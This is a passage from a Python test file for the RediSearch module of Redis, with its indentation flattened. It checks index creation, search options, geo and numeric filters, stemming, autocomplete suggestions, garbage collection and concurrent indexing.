r.execute_command('ft.search', 'idx',
'foo (bar (baz gaz))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar (foo bar) (foo bar))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (foo (bar baz (gaz)))', 'nocontent'),
r.execute_command('ft.search', 'idx', 'foo (foo (bar (baz (gaz (foo bar (gaz))))))', 'nocontent')]
for i, r in enumerate(res):
# print i, res[0], r
env.assertListEqual(res[0], r)
def testInKeys(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
for i in range(200):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello world'))
for _ in r.retry_with_rdb_reload():
for keys in (
['doc%d' % i for i in range(10)], ['doc%d' % i for i in range(0, 30, 2)], [
'doc%d' % i for i in range(99, 0, -5)]
):
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', len(keys), *keys)
env.assertEqual(len(keys), res[0])
env.assertTrue(all((k in res for k in keys)))
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', 3, 'foo', 'bar', 'baz')[0])
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'INKEYS', 99)
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'INKEYS', -1)
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'inkeys', 4, 'foo')
def testSlopInOrder(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
'title', 't1 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1, 'fields',
'title', 't1 t3 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc3', 1, 'fields',
'title', 't1 t3 t4 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc4', 1, 'fields',
'title', 't1 t3 t4 t5 t2'))
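# SLOP n allows up to n intervening terms between the query terms; adding
# INORDER also requires them to appear in the same order as in the query.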
res = r.execute_command(
'ft.search', 'idx', 't1|t4 t3|t2', 'slop', '0', 'inorder', 'nocontent')
env.assertEqual({'doc3', 'doc4', 'doc2', 'doc1'}, set(res[1:]))
res = r.execute_command(
'ft.search', 'idx', 't2 t1', 'slop', '0', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc1', res[1])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't2 t1', 'slop', '0', 'inorder')[0])
env.assertEqual(1, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '0', 'inorder')[0])
env.assertEqual(2, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '1', 'inorder')[0])
env.assertEqual(3, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '2', 'inorder')[0])
env.assertEqual(4, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '3', 'inorder')[0])
env.assertEqual(4, r.execute_command(
'ft.search', 'idx', 't1 t2', 'inorder')[0])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't t1', 'inorder')[0])
env.assertEqual(2, r.execute_command(
'ft.search', 'idx', 't1 t2 t3 t4')[0])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't1 t2 t3 t4', 'inorder')[0])
def testExact(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello another world',
'body', 'lorem ist ipsum lorem lorem'))
res = r.execute_command(
'ft.search', 'idx', '"hello world"', 'verbatim')
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
res = r.execute_command(
'ft.search', 'idx', "hello \"another world\"", 'verbatim')
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
def testGeo(env):
r = env
gsearch = lambda query, lon, lat, dist, unit='km': r.execute_command(
'ft.search', 'idx', query, 'geofilter', 'location', lon, lat, dist, unit)
gsearch_inline = lambda query, lon, lat, dist, unit='km': r.execute_command(
'ft.search', 'idx', '{} @location:[{} {} {} {}]'.format(query, lon, lat, dist, unit))
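# gsearch applies the radius via the GEOFILTER argument, while gsearch_inline
# embeds the same filter in the query string; both forms should return
# identical results.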
env.assertOk(r.execute_command('ft.create', 'idx',
'schema', 'name', 'text', 'location', 'geo'))
for i, hotel in enumerate(hotels):
env.assertOk(r.execute_command('ft.add', 'idx', 'hotel{}'.format(i), 1.0, 'fields', 'name',
hotel[0], 'location', '{},{}'.format(hotel[2], hotel[1])))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hilton')
env.assertEqual(len(hotels), res[0])
res = gsearch('hilton', "-0.1757", "51.5156", '1')
# print res
env.assertEqual(3, res[0])
env.assertEqual('hotel2', res[5])
env.assertEqual('hotel21', res[3])
env.assertEqual('hotel79', res[1])
res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '1')
env.assertListEqual(res, res2)
res = gsearch('hilton', "-0.1757", "51.5156", '10')
env.assertEqual(14, res[0])
env.assertEqual('hotel93', res[1])
env.assertEqual('hotel92', res[3])
env.assertEqual('hotel79', res[5])
res2 = gsearch('hilton', "-0.1757", "51.5156", '10000', 'm')
env.assertListEqual(res, res2)
res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '10')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '10', 'm')
env.assertEqual(1, res[0])
env.assertEqual('hotel94', res[1])
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '10', 'm')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '10', 'km')
env.assertEqual(5, res[0])
env.assertIn('hotel94', res)
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '10', 'km')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '5', 'km')
env.assertEqual(3, res[0])
env.assertIn('hotel94', res)
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '5', 'km')
env.assertListEqual(res, res2)
def testGeoDeletion(env):
if env.is_cluster():
raise unittest.SkipTest()
# Can't properly test if deleted on cluster
env.cmd('ft.create', 'idx', 'schema',
'g1', 'geo', 'g2', 'geo', 't1', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
'g1', "-0.1757,51.5156",
'g2', "-0.1757,51.5156",
't1', "hello")
env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
'g1', "-0.1757,51.5156",
'g2', "-0.1757,51.5156",
't1', "hello")
# keys are: "geo:idx/g1" and "geo:idx/g2"
env.assertEqual(2, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(2, env.cmd('zcard', 'geo:idx/g2'))
# Remove the first doc
env.cmd('ft.del', 'idx', 'doc1')
env.assertEqual(1, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(1, env.cmd('zcard', 'geo:idx/g2'))
# Replace the other one:
env.cmd('ft.add', 'idx', 'doc2', 1.0,
'replace', 'fields',
't1', 'just text here')
env.assertEqual(0, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(0, env.cmd('zcard', 'geo:idx/g2'))
def testAddHash(env):
if env.is_cluster():
raise unittest.SkipTest()
r = env
env.assertOk(r.execute_command('ft.create', 'idx', 'schema',
'title', 'text', 'weight', 10.0, 'body', 'text', 'price', 'numeric'))
env.assertTrue(
r.hmset('doc1', {"title": "hello world", "body": "lorem ipsum", "price": 2}))
env.assertTrue(
r.hmset('doc2', {"title": "hello werld", "body": "lorem ipsum", "price": 5}))
env.assertOk(r.execute_command('ft.addhash', 'idx', 'doc1', 1.0))
env.assertOk(r.execute_command('ft.addhash', 'idx', 'doc2', 1.0))
res = r.execute_command('ft.search', 'idx', "hello", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc1", res[2])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx',
"hello",
"filter", "price", "0", "3"
)
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
env.assertListEqual(
['body', 'lorem ipsum', 'price', '2', 'title', 'hello world'], res[2])
res = r.execute_command(
'ft.search', 'idx', "hello werld", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
def testInfields(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text', 'weight', 1.0))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello world lorem ipsum',
'body', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "title", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc2", res[1])
env.assertEqual("doc1", res[2])
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', 'hello', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', '\"hello world\"', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', '\"lorem ipsum\"', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
res = r.execute_command(
'ft.search', 'idx', 'lorem ipsum', "infields", 2, "body", "title", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc2", res[1])
env.assertEqual("doc1", res[2])
def testScorerSelection(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'body', 'text'))
# this is the default scorer
res = r.execute_command(
'ft.search', 'idx', 'foo', 'scorer', 'TFIDF')
env.assertEqual(res, [0])
with env.assertResponseError():
res = r.execute_command(
'ft.search', 'idx', 'foo', 'scorer', 'NOSUCHSCORER')
def testFieldSelectors(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'TiTle', 'text', 'BoDy', 'text', "יוניקוד", 'text', 'field.with,punct', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
'title', 'hello world', 'body', 'foo bar', 'יוניקוד', 'unicode', 'field.with,punct', 'punt'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 0.5, 'fields',
'body', 'hello world', 'title', 'foo bar', 'יוניקוד', 'unicode', 'field.with,punct', 'punt'))
res = r.execute_command(
'ft.search', 'idx', '@title:hello world', 'nocontent')
env.assertEqual(res, [1, 'doc1'])
res = r.execute_command(
'ft.search', 'idx', '@body:hello world', 'nocontent')
env.assertEqual(res, [1, 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body:hello @title:world', 'nocontent')
env.assertEqual(res, [0])
res = r.execute_command(
'ft.search', 'idx', '@body:hello world @title:world', 'nocontent')
env.assertEqual(res, [0])
res = r.execute_command(
'ft.search', 'idx', '@BoDy:(hello|foo) @Title:(world|bar)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body:(hello|foo world|bar)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body|title:(hello world)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@יוניקוד:(unicode)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@field\\.with\\,punct:(punt)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
def testStemming(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello kitty'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello kitties'))
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent", "verbatim")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
# test for unknown language
with env.assertResponseError():
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent", "language", "foofoofian")
def testExpander(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello kitty'))
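# SBSTEM is the built-in Snowball stemming expander; 'noexpander' disables
# query expansion entirely.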
res = r.execute_command(
'ft.search', 'idx', 'kitties',
"nocontent",
"expander", "SBSTEM"
)
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitties', "nocontent", "expander", "noexpander")
env.assertEqual(1, len(res))
env.assertEqual(0, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitti', "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitti', "nocontent", 'verbatim')
env.assertEqual(1, len(res))
env.assertEqual(0, res[0])
# Calling a stem directly works even with VERBATIM;
# the stem must be prefixed with an escaped '+'.
res = r.execute_command(
'ft.search', 'idx', '\\+kitti', "nocontent", 'verbatim')
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
def testNumericRange(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'score', 'numeric', 'price', 'numeric'))
for i in xrange(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'fields',
'title', 'hello kitty', 'score', i, 'price', 100 + 10 * i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", 0, 100)
env.assertEqual(11, len(res))
env.assertEqual(100, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", 0, 50)
env.assertEqual(51, res[0])
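# A '(' prefix makes a numeric bound exclusive, so the (0 .. (50 range matches
# scores 1 through 49.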
res = r.execute_command('ft.search', 'idx', 'hello kitty', 'verbatim', "nocontent", "limit", 0, 100,
"filter", "score", "(0", "(50")
env.assertEqual(49, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", "-inf", "+inf")
env.assertEqual(100, res[0])
# test multi filters
scrange = (19, 90)
prrange = (290, 385)
res = r.execute_command('ft.search', 'idx', 'hello kitty',
"filter", "score", scrange[
0], scrange[1],
"filter", "price", prrange[0], prrange[1])
# print res
for doc in res[2::2]:
sc = int(doc[doc.index('score') + 1])
pr = int(doc[doc.index('price') + 1])
env.assertTrue(sc >= scrange[0] and sc <= scrange[1])
env.assertGreaterEqual(pr, prrange[0])
env.assertLessEqual(pr, prrange[1])
env.assertEqual(10, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty',
"filter", "score", "19", "90",
"filter", "price", "90", "185")
env.assertEqual(0, res[0])
# Test numeric ranges as part of query syntax
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[0 100]', "nocontent")
env.assertEqual(11, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[0 50]', "nocontent")
env.assertEqual(51, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(49, res[0])
res = r.execute_command(
'ft.search', 'idx', '@score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(49, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty -@score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(51, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[-inf +inf]', "nocontent")
env.assertEqual(100, res[0])
def testSuggestions(env):
r = env
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1))
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1, 'INCR'))
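# Adding the same string with INCR increments its score rather than inserting
# a duplicate suggestion.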
res = r.execute_command("FT.SUGGET", "ac", "hello")
env.assertEqual(1, len(res))
env.assertEqual("hello world", res[0])
terms = ["hello werld", "hallo world",
"yellow world", "wazzup", "herp", "derp"]
sz = 2
for term in terms:
env.assertEqual(sz, r.execute_command(
'ft.SUGADD', 'ac', term, sz - 1))
sz += 1
for _ in r.retry_with_rdb_reload():
env.assertEqual(7, r.execute_command('ft.SUGLEN', 'ac'))
# search not fuzzy
env.assertEqual(["hello world", "hello werld"],
r.execute_command("ft.SUGGET", "ac", "hello"))
# print r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1", "WITHSCORES")
# search fuzzy - should yield more results
env.assertEqual(['hello world', 'hello werld', 'yellow world', 'hallo world'],
r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY"))
# search fuzzy with limit of 1
env.assertEqual(['hello world'],
r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1"))
# scores should be returned with WITHSCORES
rc = r.execute_command(
"ft.SUGGET", "ac", "hello", "WITHSCORES")
env.assertEqual(4, len(rc))
env.assertTrue(float(rc[1]) > 0)
env.assertTrue(float(rc[3]) > 0)
rc = r.execute_command("ft.SUGDEL", "ac", "hello world")
env.assertEqual(1L, rc)
rc = r.execute_command("ft.SUGDEL", "ac", "world")
env.assertEqual(0L, rc)
rc = r.execute_command("ft.SUGGET", "ac", "hello")
env.assertEqual(['hello werld'], rc)
def testSuggestPayload(env):
r = env
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1, 'PAYLOAD', 'foo'))
env.assertEqual(2, r.execute_command(
'ft.SUGADD', 'ac', 'hello werld', 1, 'PAYLOAD', 'bar'))
env.assertEqual(3, r.execute_command(
'ft.SUGADD', 'ac', 'hello nopayload', 1, 'PAYLOAD', ''))
env.assertEqual(4, r.execute_command(
'ft.SUGADD', 'ac', 'hello nopayload2', 1))
res = r.execute_command("FT.SUGGET", "ac", "hello", 'WITHPAYLOADS')
env.assertListEqual(['hello world', 'foo', 'hello werld', 'bar', 'hello nopayload', None, 'hello nopayload2', None],
res)
res = r.execute_command("FT.SUGGET", "ac", "hello")
env.assertListEqual(['hello world', 'hello werld', 'hello nopayload', 'hello nopayload2'],
res)
res = r.execute_command(
"FT.SUGGET", "ac", "hello", 'WITHPAYLOADS', 'WITHSCORES')
# we don't compare the scores because they may change
env.assertEqual(12, len(res))
def testPayload(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(10):
env.assertOk(r.execute_command('ft.add', 'idx', '%d' % i, 1.0,
'payload', 'payload %d' % i,
'fields', 'f', 'hello world'))
for x in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'hello world')
env.assertEqual(21, len(res))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'withpayloads')
env.assertEqual(31, len(res))
env.assertEqual(10, res[0])
for i in range(1, 30, 3):
env.assertEqual(res[i + 1], 'payload %s' % res[i])
def testGarbageCollector(env):
env.skipOnCluster()
if env.moduleArgs is not None and 'GC_POLICY FORK' in env.moduleArgs:
# this test is not relevant for the fork GC because it does not clean the last block
raise unittest.SkipTest()
N = 100
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0,
'fields', 'foo', ' '.join(('term%d' % random.randrange(0, 10) for i in range(10)))))
def get_stats(r):
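# FT.INFO replies with a flat [key, value, ...] array; fold it, and the nested
# gc_stats array, into dicts for easier lookups.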
res = r.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
gc_stats = {d['gc_stats'][x]: float(
d['gc_stats'][x + 1]) for x in range(0, len(d['gc_stats']), 2)}
d['gc_stats'] = gc_stats
return d
stats = get_stats(r)
if 'current_hz' in stats['gc_stats']:
env.assertGreater(stats['gc_stats']['current_hz'], 8)
env.assertEqual(0, stats['gc_stats']['bytes_collected'])
env.assertGreater(int(stats['num_records']), 0)
initialIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
for i in range(N):
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
for _ in range(100):
# gc is random so we need to do it long enough times for it to work
env.cmd('ft.debug', 'GC_FORCEINVOKE', 'idx')
stats = get_stats(r)
env.assertEqual(0, int(stats['num_docs']))
env.assertEqual(0, int(stats['num_records']))
if not env.is_cluster():
env.assertEqual(100, int(stats['max_doc_id']))
if 'current_hz' in stats['gc_stats']:
env.assertGreater(stats['gc_stats']['current_hz'], 30)
currentIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
# print initialIndexSize, currentIndexSize,
# stats['gc_stats']['bytes_collected']
env.assertGreater(initialIndexSize, currentIndexSize)
env.assertGreater(stats['gc_stats'][
'bytes_collected'], currentIndexSize)
for i in range(10):
res = r.execute_command('ft.search', 'idx', 'term%d' % i)
env.assertEqual([0], res)
def testReturning(env):
env.assertCmdOk('ft.create', 'idx', 'schema',
'f1', 'text',
'f2', 'text',
'n1', 'numeric', 'sortable',
'f3', 'text')
for i in range(10):
env.assertCmdOk('ft.add', 'idx', 'DOC_{0}'.format(i), 1.0, 'fields',
'f2', 'val2', 'f1', 'val1', 'f3', 'val3',
'n1', i)
# RETURN 0. Simplest case
for x in env.retry_with_reload():
res = env.cmd('ft.search', 'idx', 'val*', 'return', '0')
env.assertEqual(11, len(res))
env.assertEqual(10, res[0])
for r in res[1:]:
env.assertTrue(r.startswith('DOC_'))
for field in ('f1', 'f2', 'f3', 'n1'):
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, field)
env.assertEqual(21, len(res))
env.assertEqual(10, res[0])
for pair in grouper(res[1:], 2):
docname, fields = pair
env.assertEqual(2, len(fields))
env.assertEqual(field, fields[0])
env.assertTrue(docname.startswith('DOC_'))
# Test that we don't return SORTBY fields if they weren't specified
# also in RETURN
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'f1',
'sortby', 'n1', 'ASC')
row = res[2]
# get the first result
env.assertEqual(['f1', 'val1'], row)
# Test when field is not found
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'nonexist')
env.assertEqual(21, len(res))
env.assertEqual(10, res[0])
# Test that we don't crash if we're given the wrong number of fields
with env.assertResponseError():
res = env.cmd('ft.search', 'idx', 'val*', 'return', 700, 'nonexist')
def _test_create_options_real(env, *options):
options = [x for x in options if x]
has_offsets = 'NOOFFSETS' not in options
has_fields = 'NOFIELDS' not in options
has_freqs = 'NOFREQS' not in options
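# NOOFFSETS omits term offsets (disabling exact-phrase/slop matching),
# NOFIELDS omits per-field bits (disabling @field filters), and NOFREQS omits
# term frequencies (disabling frequency-based ranking).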
try:
env.cmd('ft.drop', 'idx')
except:
pass
options = ['idx'] + options + ['schema', 'f1', 'text', 'f2', 'text']
env.assertCmdOk('ft.create', *options)
for i in range(10):
env.assertCmdOk('ft.add', 'idx', 'doc{}'.format(
i), 0.5, 'fields', 'f1', 'value for {}'.format(i))
# Query
# res = env.cmd('ft.search', 'idx', "value for 3")
# if not has_offsets:
# env.assertIsNone(res)
# else:
# env.assertIsNotNone(res)
# Frequencies:
env.assertCmdOk('ft.add', 'idx', 'doc100',
1.0, 'fields', 'f1', 'foo bar')
env.assertCmdOk('ft.add', 'idx', 'doc200', 1.0,
'fields', 'f1', ('foo ' * 10) + ' bar')
res = env.cmd('ft.search', 'idx', 'foo')
env.assertEqual(2, res[0])
if has_offsets:
docname = res[1]
if has_freqs:
env.assertEqual('doc200', docname)
else:
env.assertEqual('doc100', docname)
env.assertCmdOk('ft.add', 'idx', 'doc300',
1.0, 'fields', 'f1', 'Hello')
res = env.cmd('ft.search', 'idx', '@f2:Hello')
if has_fields:
env.assertEqual(1, len(res))
else:
env.assertEqual(3, len(res))
def testCreationOptions(env):
from itertools import combinations
for x in range(1, 5):
for combo in combinations(('NOOFFSETS', 'NOFREQS', 'NOFIELDS', ''), x):
_test_create_options_real(env, *combo)
def testInfoCommand(env):
from itertools import combinations
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'NOFIELDS', 'schema', 'title', 'text'))
N = 50
for i in xrange(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'replace', 'fields',
'title', 'hello term%d' % i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(d['index_name'], 'idx')
env.assertEqual(d['index_options'], ['NOFIELDS'])
env.assertListEqual(
d['fields'], [['title', 'type', 'TEXT', 'WEIGHT', '1']])
if not env.is_cluster():
env.assertEquals(int(d['num_docs']), N)
env.assertEquals(int(d['num_terms']), N + 1)
env.assertEquals(int(d['max_doc_id']), N)
env.assertEquals(int(d['records_per_doc_avg']), 2)
env.assertEquals(int(d['num_records']), N * 2)
env.assertGreater(float(d['offset_vectors_sz_mb']), 0)
env.assertGreater(float(d['key_table_size_mb']), 0)
env.assertGreater(float(d['inverted_sz_mb']), 0)
env.assertGreater(float(d['bytes_per_record_avg']), 0)
env.assertGreater(float(d['doc_table_size_mb']), 0)
for x in range(1, 5):
for combo in combinations(('NOOFFSETS', 'NOFREQS', 'NOFIELDS', ''), x):
combo = list(filter(None, combo))
options = combo + ['schema', 'f1', 'text']
try:
env.cmd('ft.drop', 'idx')
except:
pass
env.assertCmdOk('ft.create', 'idx', *options)
info = env.cmd('ft.info', 'idx')
ix = info.index('index_options')
env.assertFalse(ix == -1)
opts = info[ix + 1]
# make sure that an empty opts string returns no options in
# info
if not combo:
env.assertListEqual([], opts)
for option in filter(None, combo):
env.assertTrue(option in opts)
def testNoStem(env):
env.cmd('ft.create', 'idx', 'schema', 'body',
'text', 'name', 'text', 'nostem')
for _ in env.retry_with_reload():
try:
env.cmd('ft.del', 'idx', 'doc')
except redis.ResponseError:
pass
# Insert a document
env.assertCmdOk('ft.add', 'idx', 'doc', 1.0, 'fields',
'body', "located",
'name', "located")
# Now search for the fields
res_body = env.cmd('ft.search', 'idx', '@body:location')
res_name = env.cmd('ft.search', 'idx', '@name:location')
env.assertEqual(0, res_name[0])
env.assertEqual(1, res_body[0])
def testSearchNonexistField(env):
# GH Issue 133
env.cmd('ft.create', 'idx', 'schema', 'title', 'text',
'weight', 5.0, 'body', 'text', 'url', 'text')
env.cmd('ft.add', 'idx', 'd1', 1.0, 'nosave', 'fields', 'title',
'hello world', 'body', 'lorem dipsum', 'place', '-77.0366 38.8977')
env.cmd('ft.search', 'idx', 'Foo', 'GEOFILTER',
'place', '-77.0366', '38.8977', '1', 'km')
def testSortbyMissingField(env):
# GH Issue 131
env.cmd('ft.create', 'ix', 'schema', 'txt',
'text', 'num', 'numeric', 'sortable')
env.cmd('ft.add', 'ix', 'doc1', 1.0, 'fields', 'txt', 'foo')
env.cmd('ft.search', 'ix', 'foo', 'sortby', 'num')
def testParallelIndexing(env):
# GH Issue 207
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
from threading import Thread
env.getConnection()
ndocs = 100
def runner(tid):
cli = env.getConnection()
for num in range(ndocs):
cli.execute_command('ft.add', 'idx', 'doc{}_{}'.format(tid, num), 1.0,
'fields', 'txt', 'hello world' * 20)
ths = []
for tid in range(10):
ths.append(Thread(target=runner, args=(tid,)))
[th.start() for th in ths]
[th.join() for th in ths]
res = env.cmd('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(1000, int(d['num_docs']))
def testDoubleAdd(env):
# Tests issue #210
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'hello world')
with env.assertResponseError():
env.cmd('ft.add', 'idx', 'doc1', 1.0,
'fields', 'txt', 'goodbye world')
env.assertEqual('hello world', env.cmd('ft.get', 'idx', 'doc1')[1])
env.assertEqual(0, env.cmd('ft.search', 'idx', 'goodbye')[0])
env.assertEqual(1, env.cmd('ft.search', 'idx', 'hello')[0])
# Now with replace
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'replace',
'fields', 'txt', 'goodbye world')
env.assertEqual(1, env.cmd('ft.search', 'idx', 'goodbye')[0])
env.assertEqual(0, env.cmd('ft.search', 'idx', 'hello')[0])
env.assertEqual('goodbye world', env.cmd('ft.get', 'idx', 'doc1')[1])
def testConcurrentErrors(env):
from multiprocessing import Process
import random
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
docs_per_thread = 100
num_threads = 50
docIds = ['doc{}'.format(x) for x in range(docs_per_thread)]
def thrfn():
myIds = docIds[::]
random.shuffle(myIds)
